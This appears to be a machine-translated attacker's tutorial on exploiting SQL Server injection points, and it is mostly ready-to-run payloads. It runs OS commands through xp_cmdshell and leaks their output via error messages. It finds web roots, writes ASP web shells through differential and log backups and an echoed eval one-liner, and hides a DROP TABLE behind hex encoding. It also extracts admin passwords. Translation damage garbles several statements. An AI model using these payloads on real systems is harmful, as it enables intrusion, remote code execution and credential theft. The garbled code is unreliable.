SQL Server Injection Tips

One, for the SA permissions of the user to execute the command, how to get faster results?

• There are display bits
• No display bit

In fact, the key here is not there is no display bit. EXEC master. xp_cmdshell ' systeminfo ' generates a number of rows when the data is written into a single table. and what we're going to do is how many lines through the display bit, or the error statement once burst out, the key here is the multi-line unity.

Method ①
BEGIN
IFEXISTS(Selecttable_name fromInformation_schema.TableswhereTable_name=' test_1 ')DropTabletest_1;
IF EXISTS (Selecttable_name fromInformation_schema.TableswhereTable_name=' test_2 ')Drop Tabletest_2;
CreateTABLETest_1 ([Output][varchar]( +));
InsertTest_1 execMaster. Dbo.xp_cmdshell' Ipconfig/all ';
DECLARE@resultvarchar(8000)
SET@result=' ~ '
SELECT@result[Email protected]result+"'+Output fromTest_1whereOutput>"'
SELECT@result asresult intotest_2;
SELECTConvert(int,(Select result fromtest_2));
END;

Analytical:

• The meaning of this 6-9 sentence is to declare a temporary variable of @result;
• Set the initial value to ' ~ '; test_1 the data data in sequence, the iteration condition is output> ', and the group synthesizes the new string, the string is separated by a space and finally copied to @result;
• Then set @result to an alias, and then insert the test_2.
• Last Error Echo
  Ps:
• MSSQL English Letter comparison size case-insensitive
• MSSQL string comparison size and C language in the STR_CMP () the same reason

Method ② (injection point test succeeded, test platform SQL server2008-10.0.1600.22 (X64)

• Error: and (SELECT * from test_1 for XML PATH (")) =1--
• Display: UNION Select 1, (SELECT * from Test_1 for XML PATH ("))--

Second, how to quickly find the Site directory (sa user)

• SA User is down right
• SA user has not been downgraded

here it is reasonable to distinguish the right from the non-descending right, if there is no right to be lowered. So the permissions are very good can read some saved in the local configuration, if the permissions are lower, you can use the dir command to find.

Method ① (lowered right: – Pro-Test success):
CREATE TABLE test_1 ([output] [varchar](+));
INSERT test_1 EXEC masterdbo.xp_cmdshell ' dir/s d:\web.config ';
and (SELECT * from test_1 for XML PATH(")) =1 ;


Method ② (not lowered right –system– pro-Test success):
CREATE TABLE test_1 ([output] [varchar](+));
INSERT test_1 EXEC masterDbo.xp_cmdshell ' cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3svc/1/root ';
and (SELECT * from test_1 for XML PATH(")) =1 ;


Method ③ (Sa+system permission +iis7.0+iis7.5):

%systemroot%/system32/inetsrv/appcmd.exe list site--lists Web sites
%systemroot%\system32\inetsrv\appcmd.exe list vdir--List the physical path of a Web site

Ps:
%systemroot% Representative C:\windows\

Third, how to use the injection point Getshell method
① (differential backup) – Client Pro-Test success – No permissions required, can be tested at injection points that are not SA permissions

IF EXISTS (Selecttable_name fromInformation_schema.TableswhereTable_name=' test_tmp ')DropTabletest_tmp;
BackupDatabaseXfdata toDisk =' D:\WebRoot\asp.bak ';
CreateTable[dbo]. [Test_tmp] ([cmd] [image]);
Insert intoTest_tmp (CMD)Values(0x3c25657865637574652872657175657374282261222929253e);
Backup DatabaseXfdata todisk=' D:\WebRoot\asp.asp ' withDifferential,FORMAT;


Method ② (Volume reduction) – Client affinity success – No permissions are required and can be tested at injection points that are not SA permissions
IF EXISTS (Selecttable_name fromInformation_schema.TableswhereTable_name=' test_tmp ')DropTabletest_tmp;
AlterDatabaseXfdataSetRECOVERY Full;
CreateTableTest_tmp (a image);
BackupLogXfdata toDisk =' D:\WebRoot\asp.bak ' withInit
Insert intoTest_tmp (a)Values(0x3c25657865637574652872657175657374282261222929253eda);
BackupLogXfdata toDisk =' D:\webroot\123.asp '

Ps:

• If you cannot back up, there is probably a problem with access rights. You can switch directory attempts
• If the table exists, it cannot succeed, so first determine if the table exists and delete it if it exists.

Method ③ (Echo output one sentence Trojan) –sa permissions + Current user Write permission – Pro test success
echo ^<%eval request ("pass")%^>>d:\%d1%a7%b7%d6%cf%b5%cd%b3\webroot\ Update.asp

Ps:

• Because this is an injection point, you need to be aware of the coding problem. In general, the page encoding and database encoding is consistent (if inconsistent ~ ~ ~ I lose). Here I use a Chinese path to do the description .

Iv. How to avoid using keywords like select
Method ①: Hex Obfuscation

; DECLARE @S VARCHAR(4000) SET @s=CAST( 0x44524f50205441424c4520544d505f44423b as VARCHAR(4000)); EXEC (@S); --


V. How to inject the login point how to get the background password fastest
1 ' Having 1=1--#爆出表名

1 ' GROUP by username have 1=1--# burst field name

# User_mess.account

# USER_MESS.PWD

1 ';Select/**/Convert(int,(Select/**/Top/**/1/**/ Account/**/ from/**/user_mess))--                                                           
1'; select/**/convert (int, (select/**/top/**/1/**/pwd/**/from/**/user_mess/**/where/**/account= ')Admin')) --


Vi. Conclusion

This article was compiled a long time ago, some places may have the wrong place, hoped everybody can point out. In addition, we have what posture also say, together summary summary.

Here typesetting is really not used to the habit of markdown feel now a little typesetting difficulties, please do not spray ...

SQL Server Injection Tips